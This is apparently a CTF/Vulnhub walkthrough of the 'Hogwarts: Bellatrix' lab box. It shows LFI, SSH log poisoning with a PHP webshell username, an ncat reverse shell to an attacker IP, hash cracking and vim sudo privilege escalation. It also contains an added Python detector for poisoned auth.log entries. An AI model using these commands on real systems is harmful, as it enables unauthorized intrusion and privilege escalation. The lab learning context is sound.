
Hogwarts: Bellatrix Vulnhub (Writeup)

4 min read · Dec 5, 2020

Difficulty: Pure Intermediate


#NMAP:


-sC : Default scripts

-sV : Version detection

-A : Aggressive scan (OS detection, version detection, default scripts, traceroute)

-p- : Scan all 65535 ports (TCP; UDP would need -sU as well)

-oN : Save the output as normal text

Navigate to the IP in the browser.


We have the first hint in the page source, so let's add it to the URL as a path.

Add ikilledsiriusblack.php, then review the page source again to find a valid parameter to add.

#LFI (Local File Inclusion):


OK, at this point I didn't really know what to do; the information was too little. Searching Google I found an interesting file, /var/log/auth.log, which makes SSH log poisoning possible when it can be included through the LFI.

#SSH-LOG-POISONING:

I'll share the article I found; it could be very useful. So, through the LFI parameter, navigate to /var/log/auth.log


Now SSH log poisoning is possible; you can follow the article or do your own thing. I found a really good command.

ssh '<?php echo shell_exec($_GET["jin"]);?>'@192.168.1.133

Add the parameter "jin" and let's see if it works. Remember: the goal is not to log in but to get that username written into auth.log, so once the ssh command is running press CTRL + C and go to the URL.

Now with the "jin" parameter we can pass commands and check whether the SSH log poisoning really worked; you can try whatever you want, for example "id", "ls -la", "whoami", etc.


OK, it looks like the "jin" parameter worked. Remember to append &jin= followed by the command to the URL.
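As an added example (not from the original writeup), here is a small defender-side check that scans auth.log lines for PHP tags planted in the SSH username, which is exactly the trace the poisoning above leaves behind; the log lines and the host name are constructed.

```python
import re
from collections import Counter

# Constructed sample auth.log lines (not taken from the box); the third and fourth
# carry the PHP tag that an SSH log poisoning attempt leaves in the username field.
SAMPLE_AUTH_LOG = """\
Dec  5 10:12:01 bellatrix sshd[1201]: Accepted password for lestrange from 192.168.1.50 port 50122 ssh2
Dec  5 10:13:44 bellatrix sshd[1210]: Invalid user admin from 192.168.1.115 port 51230
Dec  5 10:14:02 bellatrix sshd[1212]: Invalid user <?php echo shell_exec($_GET["jin"]);?> from 192.168.1.115 port 51234
Dec  5 10:14:02 bellatrix sshd[1212]: Failed password for invalid user <?php echo shell_exec($_GET["jin"]);?> from 192.168.1.115 port 51234 ssh2
Dec  5 10:15:10 bellatrix sshd[1220]: Connection closed by 192.168.1.50 port 50122 [preauth]
"""

# Markers that have no business inside an SSH username; any one of them is
# enough to flag the line as a poisoning attempt against an LFI-readable log.
POISON_MARKERS = re.compile(
    r"<\?php|<\?=|\$_(GET|POST|REQUEST|COOKIE)\b|\b(shell_exec|system|passthru|exec|eval)\s*\(",
    re.IGNORECASE,
)
# Pull the username and source IP out of the two sshd message shapes used above.
SSHD_USER = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for invalid user) (?P<user>.*?) from (?P<ip>\S+) port"
)

def find_poisoned_entries(log_text):
    """Return (line_no, source_ip, matched_marker) for every suspicious line."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = SSHD_USER.search(line)
        if not m:
            continue
        hit = POISON_MARKERS.search(m.group("user"))
        if hit:
            findings.append((line_no, m.group("ip"), hit.group(0)))
    return findings

def offending_sources(log_text):
    """Count poisoning attempts per source IP, useful as an alert threshold."""
    return Counter(ip for _, ip, _ in find_poisoned_entries(log_text))

if __name__ == "__main__":
    for line_no, ip, marker in find_poisoned_entries(SAMPLE_AUTH_LOG):
        print(f"line {line_no}: PHP marker {marker!r} in SSH username from {ip}")
    print(dict(offending_sources(SAMPLE_AUTH_LOG)))
```

Run as a cron job or SIEM rule, this turns a poisoned auth.log into an alert instead of a webshell; restricting the PHP include to an allowlist of files removes the LFI the payload depends on in the first place.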


OK, it works now! The time has come to load our malicious payload. I tried various payloads that I found on the web, but none seemed to work; in the end, after hours of trying, I found the right one.

ncat -e /bin/bash 192.168.1.115 1234 (pass this as the jin parameter in the URL)

It's time to launch it; make sure you are listening on the chosen port first.

nc -lnvp 1234


And we are INNNN!!!!!

Now enumerate as www-data.

#Enumeration:


I found this file and it appears to be base64; let's decode it.

Wow, we have found secrets, but what is this? A password? A directory? No, it was a rabbit hole: the encoded string was just the directory name itself. Let's browse to it.

OK, inside the secret directory we find 2 files: the first, a ".dic" file, seems to be a password list, while the second file appears to be a hash.

Copy all passwords and put them inside a file.


Here we find the hash instead. I used john to crack the password, but you could use hashcat with -m 1800 (sha512crypt). Remember to use the wordlist found.


YESSSS, we have the password for "lestrange". For convenience we log in from another shell with

ssh lestrange@IP and the password we found.


#Horizontal Privilege Escalation:

The first thing I did was check whether sudo grants this user anything that can be abused.


OK, we can use vim to become root. In this case use this link, it might be useful:

https://gtfobins.github.io/

And we are ROOT!!! Command: sudo /usr/bin/vim -c ':!/bin/sh'

I hope I have been useful to you. Good luck guys.


Written by N0t0d4y

CPTS | OSCP | OSWP | eCPTX | eWPTX | C|EH Master | CompTIA Security + | eJPT | CISM |
